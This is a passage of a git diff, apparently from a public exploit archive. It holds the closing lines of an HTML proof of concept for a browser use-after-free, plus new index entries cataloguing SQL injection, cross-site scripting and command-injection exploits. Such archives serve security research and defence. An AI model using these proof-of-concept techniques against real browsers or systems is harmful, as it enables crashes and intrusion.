+
+f.onload = () => {
+    f.onload = null;
+
+    // Garbage collection
+    for (let i = 0; i < 10; i++)
+        new ArrayBuffer(1024 * 1024 * 40);
+
+    let obj = opt();  // "opt" returns the freed string constant.
+    alert(obj);
+};
+
+// Closing the diffrent context
+f.src = 'about:blank';
+
+</script>
+</body>
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 18ee79f26..07cf5860e 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -5980,6 +5980,8 @@ id,file,description,date,author,type,platform,port
 44717,exploits/windows_x86/dos/44717.txt,"FTPShell Server 6.80 - Denial of Service",2018-05-23,"Hashim Jawad",dos,windows_x86,
 44721,exploits/linux/dos/44721.py,"Siemens SCALANCE S613 - Remote Denial of Service",2018-05-23,t4rkd3vilz,dos,linux,
 44724,exploits/android/dos/44724.txt,"Samsung Galaxy S7 Edge - Overflow in OMACP WbXml String Extension Processing",2018-05-23,"Google Security Research",dos,android,
+44758,exploits/windows/dos/44758.html,"Microsoft Edge Chakra - Cross Context Use-After-Free",2018-05-25,"Google Security Research",dos,windows,
+44759,exploits/multiple/dos/44759.html,"Skia and Firefox - Integer Overflow in SkTDArray Leading to Out-of-Bounds Write",2018-05-25,"Google Security Research",dos,multiple,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -16522,6 +16524,7 @@ id,file,description,date,author,type,platform,port
 44643,exploits/multiple/remote/44643.rb,"Apache Struts 2 - Struts 1 Plugin Showcase OGNL Code Execution (Metasploit)",2018-05-17,Metasploit,remote,multiple,8080
 44648,exploits/windows/remote/44648.rb,"HPE iMC 7.3 - Remote Code Execution (Metasploit)",2018-05-18,TrendyTofu,remote,windows,
 44656,exploits/multiple/remote/44656.txt,"mySCADA myPRO 7 - Hard-Coded Credentials",2018-05-20,"Emre ÖVÜNÇ",remote,multiple,
+44760,exploits/hardware/remote/44760.rb,"D-Link DSL-2750B - OS Command Injection (Metasploit)",2018-05-25,Metasploit,remote,hardware,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -39416,6 +39419,11 @@ id,file,description,date,author,type,platform,port
 44732,exploits/php/webapps/44732.txt,"eWallet Online Payment Gateway 2 - Cross-Site Request Forgery",2018-05-23,L0RD,webapps,php,
 44733,exploits/php/webapps/44733.txt,"Mcard Mobile Card Selling Platform 1 - SQL Injection",2018-05-23,L0RD,webapps,php,
 44734,exploits/linux/webapps/44734.txt,"Honeywell Scada System - Information Disclosure",2018-05-23,t4rkd3vilz,webapps,linux,
+44753,exploits/php/webapps/44753.txt,"KomSeo Cart 1.3 - 'my_item_search' SQL Injection",2018-05-25,AkkuS,webapps,php,
+44754,exploits/php/webapps/44754.txt,"MyBB Moderator Log Notes Plugin 1.1 - Cross-Site Scripting",2018-05-25,0xB9,webapps,php,
+44755,exploits/multiple/webapps/44755.py,"SAP Internet Transaction Server 6200.x - Session Fixation / Cross-Site Scripting",2018-05-25,"J. Carrillo Lencina",webapps,multiple,
+44757,exploits/linux/webapps/44757.txt,"Oracle WebCenter FatWire Content Server < 7 - Improper Access Control",2018-05-25,"Sebastian Cornejo",webapps,linux,
+44752,exploits/multiple/webapps/44752.txt,"Oracle WebCenter Sites 11.1.1.8.0/12.2.1.x - Cross-Site Scripting",2018-05-25,"Richard Alviarez",webapps,multiple,
 44736,exploits/hardware/webapps/44736.txt,"SKT LTE Wi-Fi SDT-CW3B1 - Unauthorized Admin Credential Change",2018-05-23,"Safak Aslan",webapps,hardware,
 44737,exploits/php/webapps/44737.txt,"WordPress Plugin Peugeot Music - Arbitrary File Upload",2018-05-23,Mr.7z,webapps,php,
 44739,exploits/asp/webapps/44739.txt,"ASP.NET jVideo Kit - 'query' SQL Injection",2018-05-24,AkkuS,webapps,asp,